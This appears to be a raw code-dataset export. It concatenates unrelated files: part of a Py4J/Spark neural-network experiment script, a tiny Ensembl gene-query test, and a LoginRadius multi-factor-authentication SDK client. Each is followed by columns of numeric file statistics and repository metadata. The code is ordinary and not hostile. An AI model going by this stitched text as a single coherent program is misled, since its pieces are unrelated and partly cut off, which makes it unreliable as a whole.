        X.saveMatrix("HWN_X_reg.ser")
        Y.saveMatrix("HWN_Y_reg.ser")
        yResults.saveMatrix("HWN_yResults_reg.ser")
        return X, Y, yResults
# Convert a Py4jArray.
def convPy4jArray(raw_vs):
    """Copy the elements of a Py4J array-like object into a plain list."""
    return [element for element in raw_vs]
import csv
from py4j.java_gateway import *
# For classification
# Experiment 1: 3-layer NN classifier (layers 400-25-10) trained with the
# nonlinear conjugate-gradient optimizer on a local Spark master.
gateway = JavaGateway(auto_field=True, auto_convert=True)
java_import(gateway.jvm, "org.apache.spark.SparkConf")
conf = gateway.jvm.SparkConf().setMaster("local[*]").setAppName("SparkNN")
sc = gateway.entry_point.getSparkContext(conf)
# loadFlag=True deserializes previously saved matrices instead of re-parsing the CSV.
X, Y, yResults = parseHandwrittenNumData(gateway, "ex4data1.csv", loadFlag=True)
numLayers = 3; numActs = gateway.new_array(gateway.jvm.int, numLayers)
numActs[0] = 400; numActs[1] = 25; numActs[2] = 10
nonlinearCGOptimizer = gateway.entry_point.getNonlinearCGOptimizer();
clusterComputingMode = 0;
acceleratingComputingMode = 0;
hwn_nn = gateway.entry_point.getNeuralNetworkClassification(clusterComputingMode, acceleratingComputingMode, numLayers, numActs, nonlinearCGOptimizer)
la = 0.0; batchMode = 0; numSamplesForMiniBatch = 1; numRepeat = 1; numIter = 20; isGradientChecking = False
JEstimationFlag = False; JEstimationRatio = 1.0
tResult = hwn_nn.train(sc, X, Y, la, batchMode, numSamplesForMiniBatch, numRepeat, numIter, isGradientChecking, JEstimationFlag, JEstimationRatio)
costVals = convPy4jArray(tResult.costVals)
jResults = hwn_nn.judge(X, 0.0)
# NOTE(review): calJudgingAccuracyC / calJudgingAccuracyR are defined elsewhere
# in this file; they compare judged results against yResults.
accuracy = calJudgingAccuracyC(yResults, jResults)
# For regression.
# Experiment 2: 3-layer NN regressor (single output unit) with the same
# nonlinear CG optimizer; uses the regression-encoded matrices.
gateway = JavaGateway(auto_field=True, auto_convert=True)
java_import(gateway.jvm, "org.apache.spark.SparkConf")
conf = gateway.jvm.SparkConf().setMaster("local[*]").setAppName("SparkNN")
sc = gateway.entry_point.getSparkContext(conf)
X, Y, yResults = parseHandwrittenNumDataReg(gateway, "ex4data1.csv", loadFlag=True)
numLayers = 3; numActs = gateway.new_array(gateway.jvm.int, numLayers)
numActs[0] = 400; numActs[1] = 25; numActs[2] = 1
nonlinearCGOptimizer = gateway.entry_point.getNonlinearCGOptimizer();
clusterComputingMode = 0;
acceleratingComputingMode = 0;
hwn_nn = gateway.entry_point.getNeuralNetworkRegression(clusterComputingMode, acceleratingComputingMode, numLayers, numActs, nonlinearCGOptimizer)
la = 0.0; batchMode = 0; numSamplesForMiniBatch = 1; numRepeat = 1; numIter = 100; isGradientChecking = False
JEstimationFlag = False; JEstimationRatio = 1.0
tResult = hwn_nn.train(sc, X, Y, la, batchMode, numSamplesForMiniBatch, numRepeat, numIter, isGradientChecking, JEstimationFlag, JEstimationRatio)
costVals = convPy4jArray(tResult.costVals)
jResults = hwn_nn.predict(X)
accuracy = calJudgingAccuracyR(yResults, jResults)
# For classification
# Experiment 3: same classifier topology trained with the L-BFGS optimizer;
# clusterComputingMode = 1 here (cluster mode), unlike the other experiments.
gateway = JavaGateway(auto_field=True, auto_convert=True)
java_import(gateway.jvm, "org.apache.spark.SparkConf")
conf = gateway.jvm.SparkConf().setMaster("local[*]").setAppName("SparkNN")
sc = gateway.entry_point.getSparkContext(conf)
X, Y, yResults = parseHandwrittenNumData(gateway, "ex4data1.csv", loadFlag=True)
numLayers = 3; numActs = gateway.new_array(gateway.jvm.int, numLayers)
numActs[0] = 400; numActs[1] = 25; numActs[2] = 10
LBFGSOptimizer = gateway.entry_point.getLBFGSOptimizer();
clusterComputingMode = 1;
acceleratingComputingMode = 0;
hwn_nn = gateway.entry_point.getNeuralNetworkClassification(clusterComputingMode, acceleratingComputingMode, numLayers, numActs, LBFGSOptimizer)
la = 0.0; batchMode = 0; numSamplesForMiniBatch = 1; numRepeat = 1; numIter = 2; isGradientChecking = False
JEstimationFlag = False; JEstimationRatio = 1.0
tResult = hwn_nn.train(sc, X, Y, la, batchMode, numSamplesForMiniBatch, numRepeat, numIter, isGradientChecking, JEstimationFlag, JEstimationRatio)
costVals = convPy4jArray(tResult.costVals)
jResults = hwn_nn.judge(X, 0.0)
accuracy = calJudgingAccuracyC(yResults, jResults)
# For regression.
# Experiment 4: regressor trained with L-BFGS in local mode.
gateway = JavaGateway(auto_field=True, auto_convert=True)
java_import(gateway.jvm, "org.apache.spark.SparkConf")
conf = gateway.jvm.SparkConf().setMaster("local[*]").setAppName("SparkNN")
sc = gateway.entry_point.getSparkContext(conf)
X, Y, yResults = parseHandwrittenNumDataReg(gateway, "ex4data1.csv", loadFlag=True)
numLayers = 3; numActs = gateway.new_array(gateway.jvm.int, numLayers)
numActs[0] = 400; numActs[1] = 25; numActs[2] = 1
LBFGSOptimizer = gateway.entry_point.getLBFGSOptimizer();
clusterComputingMode = 0;
acceleratingComputingMode = 0;
hwn_nn = gateway.entry_point.getNeuralNetworkRegression(clusterComputingMode, acceleratingComputingMode, numLayers, numActs, LBFGSOptimizer)
la = 0.0; batchMode = 0; numSamplesForMiniBatch = 1; numRepeat = 1; numIter = 50; isGradientChecking = False
JEstimationFlag = False; JEstimationRatio = 1.0
tResult = hwn_nn.train(sc, X, Y, la, batchMode, numSamplesForMiniBatch, numRepeat, numIter, isGradientChecking, JEstimationFlag, JEstimationRatio)
costVals = convPy4jArray(tResult.costVals)
jResults = hwn_nn.predict(X)
accuracy = calJudgingAccuracyR(yResults, jResults)
| 40.646789
| 150
| 0.681639
| 1,049
| 8,861
| 5.697807
| 0.148713
| 0.040154
| 0.028108
| 0.032123
| 0.907479
| 0.883219
| 0.847917
| 0.842898
| 0.816463
| 0.816296
| 0
| 0.033549
| 0.199413
| 8,861
| 217
| 151
| 40.834101
| 0.808994
| 0.052026
| 0
| 0.677852
| 0
| 0
| 0.046523
| 0.012666
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.04698
| null | null | 0.040268
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f61a116e126d13c809fc02f184e5dbf9c64c8a1c
| 131
|
py
|
Python
|
tests/ensembl_gene_test.py
|
ACastanza/ensembl-genes
|
64f053f464e2a1a60deaaaa7da6043bfab14c826
|
[
"Apache-2.0"
] | null | null | null |
tests/ensembl_gene_test.py
|
ACastanza/ensembl-genes
|
64f053f464e2a1a60deaaaa7da6043bfab14c826
|
[
"Apache-2.0"
] | null | null | null |
tests/ensembl_gene_test.py
|
ACastanza/ensembl-genes
|
64f053f464e2a1a60deaaaa7da6043bfab14c826
|
[
"Apache-2.0"
] | null | null | null |
from ensembl_genes.ensembl_genes import Ensembl_Gene_Queries
def test_ensembl_gene_queries() -> None:
    """Smoke test: constructing Ensembl_Gene_Queries must not raise."""
    _ = Ensembl_Gene_Queries()
| 21.833333
| 60
| 0.824427
| 18
| 131
| 5.5
| 0.5
| 0.333333
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114504
| 131
| 5
| 61
| 26.2
| 0.853448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f630077fc91a13993ff5b4cc8a7b6b217cb6a663
| 29,867
|
py
|
Python
|
python-idx-demo/Demo/LoginRadius/api/advanced/multifactorauthentication_api.py
|
akshay-s-770/login-page-demos
|
d2006f3af0d893488586d0da5ad54d84f99e2f92
|
[
"MIT"
] | 1
|
2020-08-01T22:11:13.000Z
|
2020-08-01T22:11:13.000Z
|
python-idx-demo/Demo/LoginRadius/api/advanced/multifactorauthentication_api.py
|
akshay-s-770/login-page-demos
|
d2006f3af0d893488586d0da5ad54d84f99e2f92
|
[
"MIT"
] | 4
|
2021-09-28T05:58:17.000Z
|
2022-03-31T01:51:36.000Z
|
python-idx-demo/Demo/LoginRadius/api/advanced/multifactorauthentication_api.py
|
shvam0000/login-page-demos
|
0cbf3df58243326f77e57b2d7dbca868f830107b
|
[
"MIT"
] | 13
|
2020-06-23T20:45:32.000Z
|
2022-02-14T14:26:01.000Z
|
# -*- coding: utf-8 -*-
# Created by LoginRadius Development Team
# Copyright 2019 LoginRadius Inc. All rights reserved.
#
class MultiFactorAuthenticationApi:
def __init__(self, lr_object):
"""
:param lr_object: this is the reference to the parent LoginRadius object.
"""
self._lr_object = lr_object
def mfa_configure_by_access_token(self, access_token, sms_template2_f_a=None):
"""This API is used to configure the Multi-factor authentication after login by using the access_token when MFA is set as optional on the LoginRadius site.
Args:
access_token: Uniquely generated identifier key by LoginRadius that is activated after successful authentication.
sms_template2_f_a: SMS Template Name
Returns:
Response containing Definition of Complete Multi-Factor Authentication Settings data
5.7
"""
if(self._lr_object.is_null_or_whitespace(access_token)):
raise Exception(self._lr_object.get_validation_message("access_token"))
query_parameters = {}
query_parameters["access_token"] = access_token
query_parameters["apiKey"] = self._lr_object.get_api_key()
if(not self._lr_object.is_null_or_whitespace(sms_template2_f_a)):
query_parameters["smsTemplate2FA"] = sms_template2_f_a
resource_path = "identity/v2/auth/account/2fa"
return self._lr_object.execute("GET", resource_path, query_parameters, None)
def mfa_update_setting(self, access_token, multi_factor_auth_model_with_lockout, fields=''):
"""This API is used to trigger the Multi-factor authentication settings after login for secure actions
Args:
access_token: Uniquely generated identifier key by LoginRadius that is activated after successful authentication.
multi_factor_auth_model_with_lockout: Model Class containing Definition of payload for MultiFactorAuthModel With Lockout API
fields: The fields parameter filters the API response so that the response only includes a specific set of fields
Returns:
Response containing Definition for Complete profile data
5.9
"""
if(self._lr_object.is_null_or_whitespace(access_token)):
raise Exception(self._lr_object.get_validation_message("access_token"))
if(multi_factor_auth_model_with_lockout is None):
raise Exception(self._lr_object.get_validation_message("multi_factor_auth_model_with_lockout"))
query_parameters = {}
query_parameters["access_token"] = access_token
query_parameters["apiKey"] = self._lr_object.get_api_key()
if(not self._lr_object.is_null_or_whitespace(fields)):
query_parameters["fields"] = fields
resource_path = "identity/v2/auth/account/2fa/verification/otp"
return self._lr_object.execute("PUT", resource_path, query_parameters, multi_factor_auth_model_with_lockout)
def mfa_update_by_access_token(self, access_token, multi_factor_auth_model_by_google_authenticator_code, fields='',
sms_template=None):
"""This API is used to Enable Multi-factor authentication by access token on user login
Args:
access_token: Uniquely generated identifier key by LoginRadius that is activated after successful authentication.
multi_factor_auth_model_by_google_authenticator_code: Model Class containing Definition of payload for MultiFactorAuthModel By GoogleAuthenticator Code API
fields: The fields parameter filters the API response so that the response only includes a specific set of fields
sms_template: SMS Template name
Returns:
Response containing Definition for Complete profile data
5.10
"""
if(self._lr_object.is_null_or_whitespace(access_token)):
raise Exception(self._lr_object.get_validation_message("access_token"))
if(multi_factor_auth_model_by_google_authenticator_code is None):
raise Exception(self._lr_object.get_validation_message("multi_factor_auth_model_by_google_authenticator_code"))
query_parameters = {}
query_parameters["access_token"] = access_token
query_parameters["apiKey"] = self._lr_object.get_api_key()
if(not self._lr_object.is_null_or_whitespace(fields)):
query_parameters["fields"] = fields
if(not self._lr_object.is_null_or_whitespace(sms_template)):
query_parameters["smsTemplate"] = sms_template
resource_path = "identity/v2/auth/account/2fa/verification/googleauthenticatorcode"
return self._lr_object.execute("PUT", resource_path, query_parameters, multi_factor_auth_model_by_google_authenticator_code)
def mfa_update_phone_number_by_token(self, access_token, phone_no2_f_a, sms_template2_f_a=None):
"""This API is used to update the Multi-factor authentication phone number by sending the verification OTP to the provided phone number
Args:
access_token: Uniquely generated identifier key by LoginRadius that is activated after successful authentication.
phone_no2_f_a: Phone Number For 2FA
sms_template2_f_a: SMS Template Name
Returns:
Response containing Definition for Complete SMS data
5.11
"""
if(self._lr_object.is_null_or_whitespace(access_token)):
raise Exception(self._lr_object.get_validation_message("access_token"))
if(self._lr_object.is_null_or_whitespace(phone_no2_f_a)):
raise Exception(self._lr_object.get_validation_message("phone_no2_f_a"))
query_parameters = {}
query_parameters["access_token"] = access_token
query_parameters["apiKey"] = self._lr_object.get_api_key()
if(not self._lr_object.is_null_or_whitespace(sms_template2_f_a)):
query_parameters["smsTemplate2FA"] = sms_template2_f_a
body_parameters = {}
body_parameters["phoneNo2FA"] = phone_no2_f_a
resource_path = "identity/v2/auth/account/2fa"
return self._lr_object.execute("PUT", resource_path, query_parameters, body_parameters)
def mfa_reset_google_auth_by_token(self, access_token, googleauthenticator):
"""This API Resets the Google Authenticator configurations on a given account via the access_token
Args:
access_token: Uniquely generated identifier key by LoginRadius that is activated after successful authentication.
googleauthenticator: boolean type value,Enable google Authenticator Code.
Returns:
Response containing Definition of Delete Request
5.12.1
"""
if(self._lr_object.is_null_or_whitespace(access_token)):
raise Exception(self._lr_object.get_validation_message("access_token"))
query_parameters = {}
query_parameters["access_token"] = access_token
query_parameters["apiKey"] = self._lr_object.get_api_key()
body_parameters = {}
body_parameters["googleauthenticator"] = googleauthenticator
resource_path = "identity/v2/auth/account/2fa/authenticator"
return self._lr_object.execute("DELETE", resource_path, query_parameters, body_parameters)
def mfa_reset_sms_auth_by_token(self, access_token, otpauthenticator):
"""This API resets the SMS Authenticator configurations on a given account via the access_token.
Args:
access_token: Uniquely generated identifier key by LoginRadius that is activated after successful authentication.
otpauthenticator: Pass 'otpauthenticator' to remove SMS Authenticator
Returns:
Response containing Definition of Delete Request
5.12.2
"""
if(self._lr_object.is_null_or_whitespace(access_token)):
raise Exception(self._lr_object.get_validation_message("access_token"))
query_parameters = {}
query_parameters["access_token"] = access_token
query_parameters["apiKey"] = self._lr_object.get_api_key()
body_parameters = {}
body_parameters["otpauthenticator"] = otpauthenticator
resource_path = "identity/v2/auth/account/2fa/authenticator"
return self._lr_object.execute("DELETE", resource_path, query_parameters, body_parameters)
def mfa_backup_code_by_access_token(self, access_token):
"""This API is used to get a set of backup codes via access_token to allow the user login on a site that has Multi-factor Authentication enabled in the event that the user does not have a secondary factor available. We generate 10 codes, each code can only be consumed once. If any user attempts to go over the number of invalid login attempts configured in the Dashboard then the account gets blocked automatically
Args:
access_token: Uniquely generated identifier key by LoginRadius that is activated after successful authentication.
Returns:
Response containing Definition of Complete Backup Code data
5.13
"""
if(self._lr_object.is_null_or_whitespace(access_token)):
raise Exception(self._lr_object.get_validation_message("access_token"))
query_parameters = {}
query_parameters["access_token"] = access_token
query_parameters["apiKey"] = self._lr_object.get_api_key()
resource_path = "identity/v2/auth/account/2fa/backupcode"
return self._lr_object.execute("GET", resource_path, query_parameters, None)
def mfa_reset_backup_code_by_access_token(self, access_token):
"""API is used to reset the backup codes on a given account via the access_token. This API call will generate 10 new codes, each code can only be consumed once
Args:
access_token: Uniquely generated identifier key by LoginRadius that is activated after successful authentication.
Returns:
Response containing Definition of Complete Backup Code data
5.14
"""
if(self._lr_object.is_null_or_whitespace(access_token)):
raise Exception(self._lr_object.get_validation_message("access_token"))
query_parameters = {}
query_parameters["access_token"] = access_token
query_parameters["apiKey"] = self._lr_object.get_api_key()
resource_path = "identity/v2/auth/account/2fa/backupcode/reset"
return self._lr_object.execute("GET", resource_path, query_parameters, None)
def mfa_login_by_email(self, email, password, email_template=None,
fields='', login_url=None, sms_template=None, sms_template2_f_a=None,
verification_url=None):
"""This API can be used to login by emailid on a Multi-factor authentication enabled LoginRadius site.
Args:
email: user's email
password: Password for the email
email_template: Email template name
fields: The fields parameter filters the API response so that the response only includes a specific set of fields
login_url: Url where the user is logging from
sms_template: SMS Template name
sms_template2_f_a: SMS Template Name
verification_url: Email verification url
Returns:
Complete user UserProfile data
9.8.1
"""
if(self._lr_object.is_null_or_whitespace(email)):
raise Exception(self._lr_object.get_validation_message("email"))
if(self._lr_object.is_null_or_whitespace(password)):
raise Exception(self._lr_object.get_validation_message("password"))
query_parameters = {}
query_parameters["apiKey"] = self._lr_object.get_api_key()
if(not self._lr_object.is_null_or_whitespace(email_template)):
query_parameters["emailTemplate"] = email_template
if(not self._lr_object.is_null_or_whitespace(fields)):
query_parameters["fields"] = fields
if(not self._lr_object.is_null_or_whitespace(login_url)):
query_parameters["loginUrl"] = login_url
if(not self._lr_object.is_null_or_whitespace(sms_template)):
query_parameters["smsTemplate"] = sms_template
if(not self._lr_object.is_null_or_whitespace(sms_template2_f_a)):
query_parameters["smsTemplate2FA"] = sms_template2_f_a
if(not self._lr_object.is_null_or_whitespace(verification_url)):
query_parameters["verificationUrl"] = verification_url
body_parameters = {}
body_parameters["email"] = email
body_parameters["password"] = password
resource_path = "identity/v2/auth/login/2fa"
return self._lr_object.execute("POST", resource_path, query_parameters, body_parameters)
def mfa_login_by_user_name(self, password, username, email_template=None,
fields='', login_url=None, sms_template=None, sms_template2_f_a=None,
verification_url=None):
"""This API can be used to login by username on a Multi-factor authentication enabled LoginRadius site.
Args:
password: Password for the email
username: Username of the user
email_template: Email template name
fields: The fields parameter filters the API response so that the response only includes a specific set of fields
login_url: Url where the user is logging from
sms_template: SMS Template name
sms_template2_f_a: SMS Template Name
verification_url: Email verification url
Returns:
Complete user UserProfile data
9.8.2
"""
if(self._lr_object.is_null_or_whitespace(password)):
raise Exception(self._lr_object.get_validation_message("password"))
if(self._lr_object.is_null_or_whitespace(username)):
raise Exception(self._lr_object.get_validation_message("username"))
query_parameters = {}
query_parameters["apiKey"] = self._lr_object.get_api_key()
if(not self._lr_object.is_null_or_whitespace(email_template)):
query_parameters["emailTemplate"] = email_template
if(not self._lr_object.is_null_or_whitespace(fields)):
query_parameters["fields"] = fields
if(not self._lr_object.is_null_or_whitespace(login_url)):
query_parameters["loginUrl"] = login_url
if(not self._lr_object.is_null_or_whitespace(sms_template)):
query_parameters["smsTemplate"] = sms_template
if(not self._lr_object.is_null_or_whitespace(sms_template2_f_a)):
query_parameters["smsTemplate2FA"] = sms_template2_f_a
if(not self._lr_object.is_null_or_whitespace(verification_url)):
query_parameters["verificationUrl"] = verification_url
body_parameters = {}
body_parameters["password"] = password
body_parameters["username"] = username
resource_path = "identity/v2/auth/login/2fa"
return self._lr_object.execute("POST", resource_path, query_parameters, body_parameters)
def mfa_login_by_phone(self, password, phone, email_template=None,
fields='', login_url=None, sms_template=None, sms_template2_f_a=None,
verification_url=None):
"""This API can be used to login by Phone on a Multi-factor authentication enabled LoginRadius site.
Args:
password: Password for the email
phone: New Phone Number
email_template: Email template name
fields: The fields parameter filters the API response so that the response only includes a specific set of fields
login_url: Url where the user is logging from
sms_template: SMS Template name
sms_template2_f_a: SMS Template Name
verification_url: Email verification url
Returns:
Complete user UserProfile data
9.8.3
"""
if(self._lr_object.is_null_or_whitespace(password)):
raise Exception(self._lr_object.get_validation_message("password"))
if(self._lr_object.is_null_or_whitespace(phone)):
raise Exception(self._lr_object.get_validation_message("phone"))
query_parameters = {}
query_parameters["apiKey"] = self._lr_object.get_api_key()
if(not self._lr_object.is_null_or_whitespace(email_template)):
query_parameters["emailTemplate"] = email_template
if(not self._lr_object.is_null_or_whitespace(fields)):
query_parameters["fields"] = fields
if(not self._lr_object.is_null_or_whitespace(login_url)):
query_parameters["loginUrl"] = login_url
if(not self._lr_object.is_null_or_whitespace(sms_template)):
query_parameters["smsTemplate"] = sms_template
if(not self._lr_object.is_null_or_whitespace(sms_template2_f_a)):
query_parameters["smsTemplate2FA"] = sms_template2_f_a
if(not self._lr_object.is_null_or_whitespace(verification_url)):
query_parameters["verificationUrl"] = verification_url
body_parameters = {}
body_parameters["password"] = password
body_parameters["phone"] = phone
resource_path = "identity/v2/auth/login/2fa"
return self._lr_object.execute("POST", resource_path, query_parameters, body_parameters)
def mfa_validate_otp_by_phone(self, multi_factor_auth_model_with_lockout, second_factor_authentication_token, fields='',
sms_template2_f_a=None):
"""This API is used to login via Multi-factor authentication by passing the One Time Password received via SMS
Args:
multi_factor_auth_model_with_lockout: Model Class containing Definition of payload for MultiFactorAuthModel With Lockout API
second_factor_authentication_token: A Uniquely generated MFA identifier token after successful authentication
fields: The fields parameter filters the API response so that the response only includes a specific set of fields
sms_template2_f_a: SMS Template Name
Returns:
Complete user UserProfile data
9.12
"""
if(multi_factor_auth_model_with_lockout is None):
raise Exception(self._lr_object.get_validation_message("multi_factor_auth_model_with_lockout"))
if(self._lr_object.is_null_or_whitespace(second_factor_authentication_token)):
raise Exception(self._lr_object.get_validation_message("second_factor_authentication_token"))
query_parameters = {}
query_parameters["apiKey"] = self._lr_object.get_api_key()
query_parameters["secondFactorAuthenticationToken"] = second_factor_authentication_token
if(not self._lr_object.is_null_or_whitespace(fields)):
query_parameters["fields"] = fields
if(not self._lr_object.is_null_or_whitespace(sms_template2_f_a)):
query_parameters["smsTemplate2FA"] = sms_template2_f_a
resource_path = "identity/v2/auth/login/2fa/verification/otp"
return self._lr_object.execute("PUT", resource_path, query_parameters, multi_factor_auth_model_with_lockout)
def mfa_validate_google_auth_code(self, google_authenticator_code, second_factor_authentication_token, fields='',
sms_template2_f_a=None):
"""This API is used to login via Multi-factor-authentication by passing the google authenticator code.
Args:
google_authenticator_code: The code generated by google authenticator app after scanning QR code
second_factor_authentication_token: A Uniquely generated MFA identifier token after successful authentication
fields: The fields parameter filters the API response so that the response only includes a specific set of fields
sms_template2_f_a: SMS Template Name
Returns:
Complete user UserProfile data
9.13
"""
if(self._lr_object.is_null_or_whitespace(google_authenticator_code)):
raise Exception(self._lr_object.get_validation_message("google_authenticator_code"))
if(self._lr_object.is_null_or_whitespace(second_factor_authentication_token)):
raise Exception(self._lr_object.get_validation_message("second_factor_authentication_token"))
query_parameters = {}
query_parameters["apiKey"] = self._lr_object.get_api_key()
query_parameters["secondFactorAuthenticationToken"] = second_factor_authentication_token
if(not self._lr_object.is_null_or_whitespace(fields)):
query_parameters["fields"] = fields
if(not self._lr_object.is_null_or_whitespace(sms_template2_f_a)):
query_parameters["smsTemplate2FA"] = sms_template2_f_a
body_parameters = {}
body_parameters["googleAuthenticatorCode"] = google_authenticator_code
resource_path = "identity/v2/auth/login/2fa/verification/googleauthenticatorcode"
return self._lr_object.execute("PUT", resource_path, query_parameters, body_parameters)
def mfa_validate_backup_code(self, multi_factor_auth_model_by_backup_code, second_factor_authentication_token, fields=''):
"""This API is used to validate the backup code provided by the user and if valid, we return an access_token allowing the user to login incases where Multi-factor authentication (MFA) is enabled and the secondary factor is unavailable. When a user initially downloads the Backup codes, We generate 10 codes, each code can only be consumed once. if any user attempts to go over the number of invalid login attempts configured in the Dashboard then the account gets blocked automatically
Args:
multi_factor_auth_model_by_backup_code: Model Class containing Definition of payload for MultiFactorAuth By BackupCode API
second_factor_authentication_token: A Uniquely generated MFA identifier token after successful authentication
fields: The fields parameter filters the API response so that the response only includes a specific set of fields
Returns:
Complete user UserProfile data
9.14
"""
if(multi_factor_auth_model_by_backup_code is None):
raise Exception(self._lr_object.get_validation_message("multi_factor_auth_model_by_backup_code"))
if(self._lr_object.is_null_or_whitespace(second_factor_authentication_token)):
raise Exception(self._lr_object.get_validation_message("second_factor_authentication_token"))
query_parameters = {}
query_parameters["apiKey"] = self._lr_object.get_api_key()
query_parameters["secondFactorAuthenticationToken"] = second_factor_authentication_token
if(not self._lr_object.is_null_or_whitespace(fields)):
query_parameters["fields"] = fields
resource_path = "identity/v2/auth/login/2fa/verification/backupcode"
return self._lr_object.execute("PUT", resource_path, query_parameters, multi_factor_auth_model_by_backup_code)
def mfa_update_phone_number(self, phone_no2_f_a, second_factor_authentication_token, sms_template2_f_a=None):
"""This API is used to update (if configured) the phone number used for Multi-factor authentication by sending the verification OTP to the provided phone number
Args:
phone_no2_f_a: Phone Number For 2FA
second_factor_authentication_token: A Uniquely generated MFA identifier token after successful authentication
sms_template2_f_a: SMS Template Name
Returns:
Response containing Definition for Complete SMS data
9.16
"""
if(self._lr_object.is_null_or_whitespace(phone_no2_f_a)):
raise Exception(self._lr_object.get_validation_message("phone_no2_f_a"))
if(self._lr_object.is_null_or_whitespace(second_factor_authentication_token)):
raise Exception(self._lr_object.get_validation_message("second_factor_authentication_token"))
query_parameters = {}
query_parameters["apiKey"] = self._lr_object.get_api_key()
query_parameters["secondFactorAuthenticationToken"] = second_factor_authentication_token
if(not self._lr_object.is_null_or_whitespace(sms_template2_f_a)):
query_parameters["smsTemplate2FA"] = sms_template2_f_a
body_parameters = {}
body_parameters["phoneNo2FA"] = phone_no2_f_a
resource_path = "identity/v2/auth/login/2fa"
return self._lr_object.execute("PUT", resource_path, query_parameters, body_parameters)
def mfa_resend_otp(self, second_factor_authentication_token, sms_template2_f_a=None):
"""This API is used to resending the verification OTP to the provided phone number
Args:
second_factor_authentication_token: A Uniquely generated MFA identifier token after successful authentication
sms_template2_f_a: SMS Template Name
Returns:
Response containing Definition for Complete SMS data
9.17
"""
if(self._lr_object.is_null_or_whitespace(second_factor_authentication_token)):
raise Exception(self._lr_object.get_validation_message("second_factor_authentication_token"))
query_parameters = {}
query_parameters["apiKey"] = self._lr_object.get_api_key()
query_parameters["secondFactorAuthenticationToken"] = second_factor_authentication_token
if(not self._lr_object.is_null_or_whitespace(sms_template2_f_a)):
query_parameters["smsTemplate2FA"] = sms_template2_f_a
resource_path = "identity/v2/auth/login/2fa/resend"
return self._lr_object.execute("GET", resource_path, query_parameters, None)
def mfa_reset_sms_authenticator_by_uid(self, otpauthenticator, uid):
"""This API resets the SMS Authenticator configurations on a given account via the UID.
Args:
otpauthenticator: Pass 'otpauthenticator' to remove SMS Authenticator
uid: UID, the unified identifier for each user account
Returns:
Response containing Definition of Delete Request
18.21.1
"""
if(self._lr_object.is_null_or_whitespace(uid)):
raise Exception(self._lr_object.get_validation_message("uid"))
query_parameters = {}
query_parameters["apiKey"] = self._lr_object.get_api_key()
query_parameters["apiSecret"] = self._lr_object.get_api_secret()
query_parameters["uid"] = uid
body_parameters = {}
body_parameters["otpauthenticator"] = otpauthenticator
resource_path = "identity/v2/manage/account/2fa/authenticator"
return self._lr_object.execute("DELETE", resource_path, query_parameters, body_parameters)
def mfa_reset_google_authenticator_by_uid(self, googleauthenticator, uid):
"""This API resets the Google Authenticator configurations on a given account via the UID.
Args:
googleauthenticator: boolean type value,Enable google Authenticator Code.
uid: UID, the unified identifier for each user account
Returns:
Response containing Definition of Delete Request
18.21.2
"""
if(self._lr_object.is_null_or_whitespace(uid)):
raise Exception(self._lr_object.get_validation_message("uid"))
query_parameters = {}
query_parameters["apiKey"] = self._lr_object.get_api_key()
query_parameters["apiSecret"] = self._lr_object.get_api_secret()
query_parameters["uid"] = uid
body_parameters = {}
body_parameters["googleauthenticator"] = googleauthenticator
resource_path = "identity/v2/manage/account/2fa/authenticator"
return self._lr_object.execute("DELETE", resource_path, query_parameters, body_parameters)
def mfa_backup_code_by_uid(self, uid):
"""This API is used to reset the backup codes on a given account via the UID. This API call will generate 10 new codes, each code can only be consumed once.
Args:
uid: UID, the unified identifier for each user account
Returns:
Response containing Definition of Complete Backup Code data
18.25
"""
if(self._lr_object.is_null_or_whitespace(uid)):
raise Exception(self._lr_object.get_validation_message("uid"))
query_parameters = {}
query_parameters["apiKey"] = self._lr_object.get_api_key()
query_parameters["apiSecret"] = self._lr_object.get_api_secret()
query_parameters["uid"] = uid
resource_path = "identity/v2/manage/account/2fa/backupcode"
return self._lr_object.execute("GET", resource_path, query_parameters, None)
def mfa_reset_backup_code_by_uid(self, uid):
    """This API is used to reset the backup codes on a given account via the UID. This API call will generate 10 new codes, each code can only be consumed once.

    Args:
        uid: UID, the unified identifier for each user account

    Returns:
        Response containing Definition of Complete Backup Code data
    18.26
    """
    if self._lr_object.is_null_or_whitespace(uid):
        raise Exception(self._lr_object.get_validation_message("uid"))

    # API credentials plus the target account identifier as query parameters.
    query_parameters = {
        "apiKey": self._lr_object.get_api_key(),
        "apiSecret": self._lr_object.get_api_secret(),
        "uid": uid,
    }

    resource_path = "identity/v2/manage/account/2fa/backupcode/reset"
    return self._lr_object.execute("GET", resource_path, query_parameters, None)
| 49.204283
| 493
| 0.708642
| 3,728
| 29,867
| 5.340933
| 0.062232
| 0.05384
| 0.079554
| 0.039375
| 0.91015
| 0.905429
| 0.889257
| 0.875496
| 0.839134
| 0.815228
| 0
| 0.007736
| 0.220946
| 29,867
| 606
| 494
| 49.285479
| 0.847989
| 0.322764
| 0
| 0.811594
| 0
| 0
| 0.123398
| 0.071444
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076087
| false
| 0.043478
| 0
| 0
| 0.152174
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f64a3ae5a0386665a11c1d7c9059b13515b00fc0
| 12,475
|
py
|
Python
|
src/main/apps/quiz/migrations/0002_auto_20210309_1526.py
|
kid7960/Uni-board
|
6a9525bef972a31576fc5dc190d9fe106e701c3e
|
[
"MIT"
] | null | null | null |
src/main/apps/quiz/migrations/0002_auto_20210309_1526.py
|
